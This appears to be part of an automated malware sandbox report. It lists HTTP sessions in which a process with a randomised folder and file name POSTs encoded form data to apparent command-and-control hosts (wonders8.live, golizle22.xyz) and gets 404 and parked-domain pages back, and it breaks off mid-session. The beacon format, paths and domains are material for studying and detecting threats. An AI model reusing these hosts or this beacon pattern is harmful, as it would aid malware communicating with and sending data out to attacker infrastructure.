                                                                                                                              2192.168.2.649987119.18.54.27801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:33:48.825151920 CEST787OUTPOST /ctxc/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.wonders8.live
                                                                                                                              Origin: http://www.wonders8.live
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 234
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.wonders8.live/ctxc/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Raw: 65 6a 36 4c 65 3d 2b 66 4c 51 79 64 6f 69 34 43 78 57 73 67 43 73 62 75 52 44 51 79 61 68 67 34 71 38 50 31 31 59 58 45 6b 57 49 66 42 6c 62 2f 53 44 31 4d 49 39 54 30 6b 52 36 63 68 73 6b 4d 59 43 2b 31 52 51 50 6b 4f 62 31 31 50 54 54 56 45 78 6b 30 52 46 31 71 6c 78 77 53 4c 30 72 74 44 76 6f 44 66 48 63 6c 47 79 49 52 74 49 43 41 52 31 57 4e 66 47 30 6a 4d 62 6d 77 76 7a 2b 6b 68 47 5a 46 65 30 39 4b 64 53 4d 7a 42 43 42 59 66 67 74 74 51 73 48 54 4b 63 78 7a 5a 38 4d 51 74 49 5a 2f 53 74 49 78 55 52 5a 6a 4b 59 70 57 34 38 76 63 4e 53 38 35 55 56 79 72 44 78 66 2f 7a 50 39 65 6d 70 35 38 7a 50 75 6e 38 62 58 35 33 2f 53 76 77 76 39 51 5a 32 74 69 5a 70 49 75 43 32 6a 73 76 59 55 77 3d 3d
                                                                                                                              Data Ascii: ej6Le=+fLQydoi4CxWsgCsbuRDQyahg4q8P11YXEkWIfBlb/SD1MI9T0kR6chskMYC+1RQPkOb11PTTVExk0RF1qlxwSL0rtDvoDfHclGyIRtICAR1WNfG0jMbmwvz+khGZFe09KdSMzBCBYfgttQsHTKcxzZ8MQtIZ/StIxURZjKYpW48vcNS85UVyrDxf/zP9emp58zPun8bX53/Svwv9QZ2tiZpIuC2jsvYUw==
                                                                                                                              Oct 7, 2024 12:33:49.803615093 CEST643INHTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 07 Oct 2024 10:33:49 GMT
                                                                                                                              Server: Apache
                                                                                                                              Upgrade: h2,h2c
                                                                                                                              Connection: Upgrade, close
                                                                                                                              Last-Modified: Mon, 01 Mar 2021 15:47:38 GMT
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Content-Length: 358
                                                                                                                              Content-Type: text/html
                                                                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 52 4b 4f c3 30 0c be ef 57 58 41 93 e0 b0 b6 7b 30 6d 7d 09 21 71 e1 02 37 b8 4d 59 93 b6 5e db 24 4a b2 17 13 ff 9d 74 ad 0a 1c 90 48 a4 c4 ce f7 f9 b3 6c 27 2e 6d 53 a7 a3 b8 e4 94 a5 23 70 2b 36 f6 5c f3 ce 6e 97 57 4b ca b8 86 0b 6c a5 76 46 08 d3 a5 3a 81 91 35 32 b8 c9 e7 ed 8e 7a 6c 62 a5 fa 8d cf 17 eb 15 db 0e b8 a6 0c f7 26 84 fb 60 1c c1 11 99 2d 1d 7d 16 a8 53 04 25 c7 a2 b4 83 4b 05 36 d4 a2 14 21 18 85 02 66 06 6a 14 9c 6a 40 91 a3 40 cb 23 50 d2 60 47 c9 f1 c4 59 04 d7 f4 8b 56 bb e6 b9 ed cd cf a1 94 87 8a 9f 73 4d 1b 6e 3a cd 0b 04 63 77 58 4d 85 c9 a5 6e 42 d0 d2 52 cb 6f 03 c6 8b 3b 17 09 d3 e0 0f c6 7c 39 70 3a fd d8 ff d1 b7 d8 64 1a 95 85 9a 8a 62 4f 0b 9e 90 67 7a a0 dd 23 49 0f ae 88 8d a9 3e 36 ca 75 28 01 b2 7e 7d 79 7c 7a 5f 05 6f 24 72 2a 57 d2 3f 64 c0 e8 2c 21 a5 b5 2a f4 fd 8c 09 6f 67 da b6 78 0c 35 cf 6c 7e 64 5e 26 1b df 54 93 9d 51 54 57 9b 2b a8 4a 45 d2 ef 24 b1 df cd 3d de 4a 76 76 17 c3 03 64 35 35 26 21 dd d4 09 20 4b 88 13 e9 [TRUNCATED]
                                                                                                                              Data Ascii: RKO0WXA{0m}!q7MY^$JtHl'.mS#p+6\nWKlvF:52zlb&`-}S%K6!fjj@@#P`GYVsMn:cwXMnBRo;|9p:dbOgz#I>6u(~}y|z_o$r*W?d,!*ogx5l~d^&TQTW+JE$=Jvvd55&! K]8m`wcG


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              3192.168.2.649992119.18.54.27801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:33:51.374537945 CEST1800OUTPOST /ctxc/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.wonders8.live
                                                                                                                              Origin: http://www.wonders8.live
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 1246
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.wonders8.live/ctxc/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Raw: 65 6a 36 4c 65 3d 2b 66 4c 51 79 64 6f 69 34 43 78 57 73 67 43 73 62 75 52 44 51 79 61 68 67 34 71 38 50 31 31 59 58 45 6b 57 49 66 42 6c 62 2f 61 44 31 2b 77 39 54 58 63 52 37 63 68 73 36 38 59 66 2b 31 51 4d 50 6e 2b 6c 31 31 44 74 54 58 38 78 6c 58 4a 46 77 65 35 78 35 53 4c 30 6a 4e 44 75 6d 6a 66 6f 63 6c 57 32 49 53 46 49 43 41 52 31 57 4d 50 47 32 79 4d 62 67 77 76 38 35 6b 68 61 49 56 65 59 39 4f 78 6a 4d 7a 46 38 55 35 2f 67 74 4a 4d 73 47 6c 6d 63 35 7a 5a 2b 50 51 74 51 5a 2f 4f 32 49 78 49 73 5a 69 2b 79 70 52 34 38 74 6f 67 4c 37 4e 6c 4c 68 6f 66 78 66 76 50 49 78 61 57 70 67 4b 50 63 6f 33 41 35 57 72 72 57 63 4a 77 49 77 42 51 43 6c 6a 46 36 4c 37 54 56 67 4f 69 47 4b 43 4f 7a 66 54 39 31 39 65 6e 63 64 67 46 4a 46 61 59 34 42 6e 6b 48 36 37 67 30 76 6f 39 74 63 67 4e 44 46 79 6f 62 45 70 31 62 4d 55 6d 6d 71 64 79 46 46 64 71 68 72 76 48 64 42 42 56 50 59 59 56 52 73 58 43 67 56 49 6b 4c 53 71 42 34 54 6e 41 70 67 65 73 51 76 48 4e 59 45 38 4f 43 70 31 65 4e 6d 62 2b 4f 45 52 36 4a [TRUNCATED]
                                                                                                                              Data Ascii: ej6Le=+fLQydoi4CxWsgCsbuRDQyahg4q8P11YXEkWIfBlb/aD1+w9TXcR7chs68Yf+1QMPn+l11DtTX8xlXJFwe5x5SL0jNDumjfoclW2ISFICAR1WMPG2yMbgwv85khaIVeY9OxjMzF8U5/gtJMsGlmc5zZ+PQtQZ/O2IxIsZi+ypR48togL7NlLhofxfvPIxaWpgKPco3A5WrrWcJwIwBQCljF6L7TVgOiGKCOzfT919encdgFJFaY4BnkH67g0vo9tcgNDFyobEp1bMUmmqdyFFdqhrvHdBBVPYYVRsXCgVIkLSqB4TnApgesQvHNYE8OCp1eNmb+OER6Jn1EqKGhJeA31sN+7YtyVgTyNkqKctJQ8y4HHisg+HyPM268PO7pJX5y45xE9kj/8Cfv47p+u6N8d1ASJkMkAaCtvdL/XFNaMjn0xCV/EuD8sC4kBTcKW8VKG/f2cf6ojeNeBpXvfqul/HZ2yD9OwoMz04K/zOqvE9Gt1B41bQppKrLntDRo31qT28L8piZEJHR3Hd8NQ+NsZIYaUx8t2Kxv9RdbB07IkvQJeKldef+D9cmQp9XcVjdcoHBwoxEIMhcmuEmHUtpwrd60ZMGyh1h1f+nIp5rmiq4A7LB0/qFPS+g6TfLUvYkzVtGD82Ck65AWQmw80AiNXWLIt98hIsNH1JSKHLzsPfZG/9Mq5AK+Z4RhdiNY9/acxtAio1cIt91AaKscYczjBb5UDzH0NpLswqa4cZs5ondOSsFGivfqoQ+/sdZee1B7qLrK6KQhw+Cw6XhR2TI63B5fYBETLbX5M8hK8pHHGG/YZUfhuzFmX7etzh5uWYXfJyhkRi99VZwZ9oh5KOlo8L/mFRYJelErpqpEvltsaL+XsyjgssTV6N9+8jss8gT8ZVLC/cZEHACnXBtIHC9XznJQVEZaVenXT7I1OKXJtoEClPRlsBuVvMBTZ6CybeIrHSe4F6JggHxIAwQNgCLqrYIwi4lKVBC5fbD8nAvFAyn [TRUNCATED]
                                                                                                                              Oct 7, 2024 12:33:52.367022038 CEST643INHTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 07 Oct 2024 10:33:52 GMT
                                                                                                                              Server: Apache
                                                                                                                              Upgrade: h2,h2c
                                                                                                                              Connection: Upgrade, close
                                                                                                                              Last-Modified: Mon, 01 Mar 2021 15:47:38 GMT
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Content-Length: 358
                                                                                                                              Content-Type: text/html
                                                                                                                              Data Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 52 4b 4f c3 30 0c be ef 57 58 41 93 e0 b0 b6 7b 30 6d 7d 09 21 71 e1 02 37 b8 4d 59 93 b6 5e db 24 4a b2 17 13 ff 9d 74 ad 0a 1c 90 48 a4 c4 ce f7 f9 b3 6c 27 2e 6d 53 a7 a3 b8 e4 94 a5 23 70 2b 36 f6 5c f3 ce 6e 97 57 4b ca b8 86 0b 6c a5 76 46 08 d3 a5 3a 81 91 35 32 b8 c9 e7 ed 8e 7a 6c 62 a5 fa 8d cf 17 eb 15 db 0e b8 a6 0c f7 26 84 fb 60 1c c1 11 99 2d 1d 7d 16 a8 53 04 25 c7 a2 b4 83 4b 05 36 d4 a2 14 21 18 85 02 66 06 6a 14 9c 6a 40 91 a3 40 cb 23 50 d2 60 47 c9 f1 c4 59 04 d7 f4 8b 56 bb e6 b9 ed cd cf a1 94 87 8a 9f 73 4d 1b 6e 3a cd 0b 04 63 77 58 4d 85 c9 a5 6e 42 d0 d2 52 cb 6f 03 c6 8b 3b 17 09 d3 e0 0f c6 7c 39 70 3a fd d8 ff d1 b7 d8 64 1a 95 85 9a 8a 62 4f 0b 9e 90 67 7a a0 dd 23 49 0f ae 88 8d a9 3e 36 ca 75 28 01 b2 7e 7d 79 7c 7a 5f 05 6f 24 72 2a 57 d2 3f 64 c0 e8 2c 21 a5 b5 2a f4 fd 8c 09 6f 67 da b6 78 0c 35 cf 6c 7e 64 5e 26 1b df 54 93 9d 51 54 57 9b 2b a8 4a 45 d2 ef 24 b1 df cd 3d de 4a 76 76 17 c3 03 64 35 35 26 21 dd d4 09 20 4b 88 13 e9 [TRUNCATED]
                                                                                                                              Data Ascii: RKO0WXA{0m}!q7MY^$JtHl'.mS#p+6\nWKlvF:52zlb&`-}S%K6!fjj@@#P`GYVsMn:cwXMnBRo;|9p:dbOgz#I>6u(~}y|z_o$r*W?d,!*ogx5l~d^&TQTW+JE$=Jvvd55&! K]8m`wcG


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              4192.168.2.649994119.18.54.27801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:33:53.914181948 CEST505OUTGET /ctxc/?ej6Le=zdjwxosx+nYBz3+zbsBPWm+/7ve+ekB9VgYRIagILtbm8OwwRgMV6Kxr3Il58QUpA1eFuFbhbn4bqlVkjsdXtj71u+jihQLEfVmONzp8WE9uDtKzy1Bx2zuvnmoFIjKdlKtQFkI=&An=mLdxo2Y8RLRh HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Host: www.wonders8.live
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Oct 7, 2024 12:33:54.876702070 CEST844INHTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 07 Oct 2024 10:33:54 GMT
                                                                                                                              Server: Apache
                                                                                                                              Upgrade: h2,h2c
                                                                                                                              Connection: Upgrade, close
                                                                                                                              Last-Modified: Mon, 01 Mar 2021 15:47:38 GMT
                                                                                                                              Accept-Ranges: bytes
                                                                                                                              Content-Length: 583
                                                                                                                              Vary: Accept-Encoding
                                                                                                                              Content-Type: text/html
                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 6c 6f 61 64 65 72 20 7b 20 62 6f 72 64 65 72 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 66 33 66 33 66 33 3b 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 36 70 78 20 73 6f 6c 69 64 20 23 33 34 39 38 64 62 3b 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 35 30 25 3b 20 77 69 64 74 68 3a 20 31 32 30 70 78 3b 20 68 65 69 67 68 74 3a 20 31 32 30 70 78 3b 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 70 69 6e 20 32 73 20 6c 69 6e 65 61 72 20 69 6e 66 69 6e 69 74 65 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 74 6f 70 3a 20 34 30 25 3b 20 6c 65 66 74 3a 20 34 30 25 3b 20 7d 0a 20 20 20 20 20 20 20 20 40 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 20 7b 20 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 30 64 65 67 29 3b 20 7d 20 31 30 30 25 20 7b 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 28 33 36 30 64 65 67 29 3b 20 7d 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a [TRUNCATED]
                                                                                                                              Data Ascii: <html><head> <style> .loader { border: 16px solid #f3f3f3; border-top: 16px solid #3498db; border-radius: 50%; width: 120px; height: 120px; animation: spin 2s linear infinite; position: fixed; top: 40%; left: 40%; } @keyframes spin { 0% { transform: rotate(0deg); } 100% { transform: rotate(360deg); } } </style> <script language="Javascript">var _skz_pid = "9POBEX80W";</script> <script language="Javascript" src="http://cdn.jsinit.directfwd.com/sk-jspark_init.php"></script></head><body><div class="loader" id="sk-loader"></div></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              5192.168.2.649995104.21.5.125801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:33:59.921257019 CEST763OUTPOST /kpbt/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.golizle22.xyz
                                                                                                                              Origin: http://www.golizle22.xyz
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 210
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.golizle22.xyz/kpbt/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Raw: 65 6a 36 4c 65 3d 57 78 36 58 6c 4c 73 2f 43 4e 33 66 39 73 31 67 76 44 5a 37 32 6d 50 75 47 63 4b 44 66 59 6a 6a 37 4c 54 44 56 4d 76 4f 53 55 58 68 62 52 57 36 54 38 4a 53 7a 61 32 43 48 4b 34 53 49 7a 79 30 5a 4b 30 34 43 54 63 5a 58 47 44 67 5a 47 6e 67 4e 36 36 34 59 39 2b 38 35 7a 79 76 6d 6d 6f 65 47 53 55 79 68 74 2b 7a 53 64 5a 66 2b 31 54 6c 37 5a 72 6c 2f 31 48 4f 43 4b 66 31 77 62 39 7a 6e 49 45 6a 4c 66 6f 2b 65 6b 6b 56 77 77 30 6f 33 59 34 6c 51 59 42 33 4f 4a 52 52 76 79 6b 44 31 38 4b 42 41 2b 6d 6f 2f 42 7a 41 30 59 79 72 68 74 46 51 52 71 6c 30 6b 41 56 48 4b 79 64 7a 66 50 48 33 53 4e 45 34 2b 53 4b 4f
                                                                                                                              Data Ascii: ej6Le=Wx6XlLs/CN3f9s1gvDZ72mPuGcKDfYjj7LTDVMvOSUXhbRW6T8JSza2CHK4SIzy0ZK04CTcZXGDgZGngN664Y9+85zyvmmoeGSUyht+zSdZf+1Tl7Zrl/1HOCKf1wb9znIEjLfo+ekkVww0o3Y4lQYB3OJRRvykD18KBA+mo/BzA0YyrhtFQRql0kAVHKydzfPH3SNE4+SKO
                                                                                                                              Oct 7, 2024 12:34:00.756877899 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 07 Oct 2024 10:34:00 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                              pragma: no-cache
                                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LL37YFXTRqAIbPLbXeOE%2FYraQGhB566vXWDUjHGuYJaxdaNdgUuFHNG27XbnLVWYWiOp0qb%2BLnC7wfYIXW2SDAIa7v9hfLKS2%2BIP3L8f4%2FNQbofDeS6lHXze%2Bbj2IkN8iEmETw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8ced3c781af6438a-EWR
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Data Raw: 32 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 42 4f 36 7d e6 23 a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb [TRUNCATED]
                                                                                                                              Data Ascii: 2d8dT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweWBO6}#!{N-EK/1);. brMpfXx]168Jg8HJ'jrkCGU3L\Bg1Hln>^j4[Z5chhk/P>O(=5M'<r9SSM[!E@G#F,[c]>yl
                                                                                                                              Oct 7, 2024 12:34:00.756895065 CEST195INData Raw: 7f f7 6f fe 3a 4a d9 38 af d0 4f 50 c8 86 3d 04 67 48 81 df 34 f2 95 98 4f 72 9d ad ae ca c6 ed d3 a0 a5 72 bb 02 c4 04 14 47 d0 72 b5 9a c3 e3 24 ae 6f ae 80 6c 40 9e ba b0 f1 f5 ad 77 5b 65 0e 30 b8 1d 7a 54 d0 1c e0 0b 31 7e 1b 10 15 fc 87 0d
                                                                                                                              Data Ascii: o:J8OP=gH4OrrGr$ol@w[e0zT1~|jXK~V[g0?SI$@AH meN/wYOb<3^x?e0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              6192.168.2.649996104.21.5.125801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:34:02.461504936 CEST787OUTPOST /kpbt/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                              Accept-Language: en-US
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Host: www.golizle22.xyz
                                                                                                                              Origin: http://www.golizle22.xyz
                                                                                                                              Connection: close
                                                                                                                              Content-Length: 234
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.golizle22.xyz/kpbt/
                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                                                                                                              Data Raw: 65 6a 36 4c 65 3d 57 78 36 58 6c 4c 73 2f 43 4e 33 66 38 4d 46 67 74 6b 74 37 2f 6d 50 78 49 38 4b 44 57 34 6a 6e 37 4c 76 44 56 4f 44 67 53 6d 7a 68 65 46 61 36 55 4f 68 53 2b 36 32 43 54 36 34 58 46 54 79 2f 5a 4b 34 77 43 52 34 5a 58 47 58 67 5a 48 33 67 4e 4e 6d 35 59 74 2b 2b 32 54 79 68 69 6d 6f 65 47 53 55 79 68 74 61 56 53 64 42 66 2b 46 6a 6c 36 34 72 6d 32 56 47 38 55 61 66 31 30 62 39 33 6e 49 46 32 4c 64 63 55 65 6d 63 56 77 77 45 6f 33 4d 73 71 5a 59 42 39 54 5a 51 41 72 67 4e 4e 37 36 54 38 49 66 65 4c 6a 52 33 31 78 75 7a 78 39 65 46 7a 44 36 46 32 6b 43 4e 31 4b 53 64 5a 64 50 2f 33 41 61 49 66 78 6d 76 74 30 6b 50 59 4f 46 66 4b 6e 6c 35 4d 66 6a 45 69 72 2b 5a 6a 37 77 3d 3d
                                                                                                                              Data Ascii: ej6Le=Wx6XlLs/CN3f8MFgtkt7/mPxI8KDW4jn7LvDVODgSmzheFa6UOhS+62CT64XFTy/ZK4wCR4ZXGXgZH3gNNm5Yt++2TyhimoeGSUyhtaVSdBf+Fjl64rm2VG8Uaf10b93nIF2LdcUemcVwwEo3MsqZYB9TZQArgNN76T8IfeLjR31xuzx9eFzD6F2kCN1KSdZdP/3AaIfxmvt0kPYOFfKnl5MfjEir+Zj7w==
                                                                                                                              Oct 7, 2024 12:34:03.309200048 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                              Date: Mon, 07 Oct 2024 10:34:03 GMT
                                                                                                                              Content-Type: text/html
                                                                                                                              Transfer-Encoding: chunked
                                                                                                                              Connection: close
                                                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                              pragma: no-cache
                                                                                                                              x-turbo-charged-by: LiteSpeed
                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jdca9yCKIUd0ide0nZ31LWurKy8GwdMBWW1LfuqAS7NIm6v%2BfLYCgBqvOBsBSj%2BC8nIw5x8UAtAI%2FaiqCgiB4Jj8TNxjcn3gs8r8z%2BOqymherLgkh3E%2FFXuRLqule9%2Bk66CpOw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8ced3c881df40fa5-EWR
                                                                                                                              Content-Encoding: gzip
                                                                                                                              Data Raw: 32 64 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 64 54 ed 8a db 3a 10 fd 1f e8 3b cc 7a 29 74 21 de c8 59 87 16 db 31 2d fd a0 17 4a ef 42 17 2e fd 29 5b e3 68 58 59 72 a5 89 93 b4 f4 dd 2f 72 92 fd 68 35 20 4b e3 33 a3 99 33 23 55 17 1f fe 7d 7f f7 fd f6 23 68 ee 4d 3d ab e2 07 02 1f 0c ae 13 8d b4 d1 5c 64 42 bc 4c e2 2f 94 aa 9e 55 3d b2 04 2b 7b 5c 27 23 e1 6e 70 9e 13 68 9d 65 b4 bc 4e 76 a4 58 af 15 8e d4 62 3a 6d e6 40 96 98 a4 49 43 2b 0d ae b3 39 04 ed c9 de a7 ec d2 8e 78 6d 5d 02 8b 7a 56 31 b1 c1 1a 72 91 c3 57 c7 f0 c9 6d ad 7a 31 ab 16 47 7d 35 05 55 bf ed 51 91 84 57 83 c7 0e 7d 48 5b 67 9c 4f 43 ab b1 c7 42 49 7f 7f f5 ab 71 ea f0 ab 91 ed fd c6 47 17 47 48 71 29 84 b8 a0 3e 86 2b 2d ff fe 5d 2d 8e 0e ab c5 29 af 68 76 ce fc 68 02 97 79 9e 97 d0 4b bf 21 5b 88 b2 73 96 0b b0 ce f7 d2 40 96 0f fb c5 52 0c 7b 78 e7 49 9a 39 7c 46 33 22 53 2b e7 10 a4 0d 69 40 4f 5d 09 4f 48 2c e1 af a8 e0 b2 eb ba 32 b2 ab 68 fc 83 77 b9 65 57 42 4f 36 7d e6 23 a9 21 8e a7 06 8c 7b 4e a5 a1 8d 2d a0 45 cb [TRUNCATED]
                                                                                                                              Data Ascii: 2d8dT:;z)t!Y1-JB.)[hXYr/rh5 K33#U}#hM=\dBL/U=+{\'#npheNvXb:m@IC+9xm]zV1rWmz1G}5UQW}H[gOCBIqGGHq)>+-]-)hvhyK![s@R{xI9|F3"S+i@O]OH,2hweWBO6}#!{N-EK/1);. brMpfXx]168Jg8HJ'jrkCGU3L\Bg1Hln>^j4[Z5chhk/P>O(=5M'<r9SSM[!E@G#F,[c]>yl
                                                                                                                              Oct 7, 2024 12:34:03.309217930 CEST197INData Raw: d8 97 7f f7 6f fe 3a 4a d9 38 af d0 4f 50 c8 86 3d 04 67 48 81 df 34 f2 95 98 4f 72 9d ad ae ca c6 ed d3 a0 a5 72 bb 02 c4 04 14 47 d0 72 b5 9a c3 e3 24 ae 6f ae 80 6c 40 9e ba b0 f1 f5 ad 77 5b 65 0e 30 b8 1d 7a 54 d0 1c e0 0b 31 7e 1b 10 15 fc
                                                                                                                              Data Ascii: o:J8OP=gH4OrrGr$ol@w[e0zT1~|jXK~V[g0?SI$@AH meN/wYOb<3^x?e0


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              7192.168.2.649998104.21.5.125801460C:\Program Files (x86)\oXMrKrVQmpfyXXbTeHWanCtVJeNmquaEinTWGKjuVyEkKRtWr\IEFVDUdSaLLhw.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 7, 2024 12:34:05.032109976 CEST1800OUTPOST /kpbt/ HTTP/1.1
